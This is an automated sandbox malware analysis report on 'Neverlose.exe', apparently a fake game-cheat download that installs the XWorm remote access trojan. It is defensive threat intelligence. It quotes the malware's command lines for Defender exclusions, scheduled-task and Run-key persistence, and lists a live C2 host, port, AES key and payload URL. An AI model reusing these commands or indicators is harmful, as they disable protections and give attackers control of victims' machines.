Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Neverlose.exe

Overview

General Information

Sample name:Neverlose.exe
Analysis ID:1498483
MD5:39d6ec26690ffee2e74fb9694b30453c
SHA1:85a689c84e3a6584ed2cfca6da05c54a7ebfeb18
SHA256:4bf2d648bf901a9c4f26b43f85e26b6659e22657a3d308dea668de43fed2dfdb
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Neverlose.exe (PID: 5888 cmdline: "C:\Users\user\Desktop\Neverlose.exe" MD5: 39D6EC26690FFEE2E74FB9694B30453C)
    • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Solara.exe (PID: 7184 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 8AC3D32DDD136180B75C36A39398F39F)
      • powershell.exe (PID: 7388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_chost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1188 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SolaraBootstrapper.exe (PID: 7200 cmdline: "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" MD5: 6557BD5240397F026E675AFB78544A26)
      • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Solara.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 8AC3D32DDD136180B75C36A39398F39F)
  • Solara.exe (PID: 7980 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 8AC3D32DDD136180B75C36A39398F39F)
  • sv_chost.exe (PID: 7624 cmdline: C:\Users\user\AppData\Roaming\sv_chost.exe MD5: 8AC3D32DDD136180B75C36A39398F39F)
  • sv_chost.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Roaming\sv_chost.exe" MD5: 8AC3D32DDD136180B75C36A39398F39F)
  • sv_chost.exe (PID: 7460 cmdline: "C:\Users\user\AppData\Roaming\sv_chost.exe" MD5: 8AC3D32DDD136180B75C36A39398F39F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["22.ip.gl.ply.gg"], "Port": "14520", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Solara.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\Solara.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x12991:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x12a2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x12b43:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x112e3:$cnc4: POST / HTTP/1.1
    C:\Users\user\AppData\Roaming\sv_chost.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\sv_chost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x12991:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x12a2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x12b43:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x112e3:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x12791:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x1282e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x12943:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x110e3:$cnc4: POST / HTTP/1.1
        00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x1e841:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x1e8de:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x1e9f3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x1d193:$cnc4: POST / HTTP/1.1
          Process Memory Space: Neverlose.exe PID: 5888JoeSecurity_XWormYara detected XWormJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.0.Solara.exe.da0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              4.0.Solara.exe.da0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x12991:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x12a2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x12b43:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x112e3:$cnc4: POST / HTTP/1.1
              0.2.Neverlose.exe.3942eb0.5.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.2.Neverlose.exe.3942eb0.5.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x10b91:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x10c2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x10d43:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xf4e3:$cnc4: POST / HTTP/1.1
                0.2.Neverlose.exe.3942eb0.5.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  Click to see the 4 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Solara.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Neverlose.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Solara.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Neverlose.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Solara.exe, ProcessId: 7184, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sv_chost.lnk
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solara.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentProcessId: 7184, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", ProcessId: 1188, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solara.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentProcessId: 7184, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", ProcessId: 1188, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe

                  Suricata Signatures

                  Timestamp:2024-08-24T21:55:06.804547+0200
                  SID:2803305
                  Severity:3
                  Source Port:49732
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-24T21:57:03.276679+0200
                  SID:2855924
                  Severity:1
                  Source Port:49741
                  Destination Port:14520
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: Neverlose.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: 22.ip.gl.ply.ggAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeAvira: detection malicious, Label: TR/Spy.Gen
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeAvira: detection malicious, Label: TR/Spy.Gen
                  Found malware configuration
                  Source: 0000000F.00000002.1976951669.00000000028F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["22.ip.gl.ply.gg"], "Port": "14520", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeReversingLabs: Detection: 76%
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeReversingLabs: Detection: 33%
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeReversingLabs: Detection: 76%
                  Multi AV Scanner detection for submitted file
                  Source: Neverlose.exeVirustotal: Detection: 41%Perma Link
                  Source: Neverlose.exeReversingLabs: Detection: 73%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: Neverlose.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpackString decryptor: 22.ip.gl.ply.gg
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpackString decryptor: 14520
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpackString decryptor: <123456789>
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpackString decryptor: <Xwormmm>
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpackString decryptor: Cheat_User
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpackString decryptor: USB.exe
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpackString decryptor: %AppData%
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpackString decryptor: sv_chost.exe

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\Neverlose.exeUnpacked PE file: 0.2.Neverlose.exe.ff0000.0.unpack
                  Source: Neverlose.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe.0.dr
                  Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe.0.dr

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49741 -> 147.185.221.22:14520
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 22.ip.gl.ply.gg
                  Connects to many ports of the same IP (likely port scanning)
                  Source: global trafficTCP traffic: 147.185.221.22 ports 0,1,2,4,5,14520
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.Neverlose.exe.3939200.4.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.4:49740 -> 147.185.221.22:14520
                  Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com
                  Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
                  Source: Joe Sandbox ViewIP Address: 147.185.221.22 147.185.221.22
                  Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
                  Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 140.82.121.4:443
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
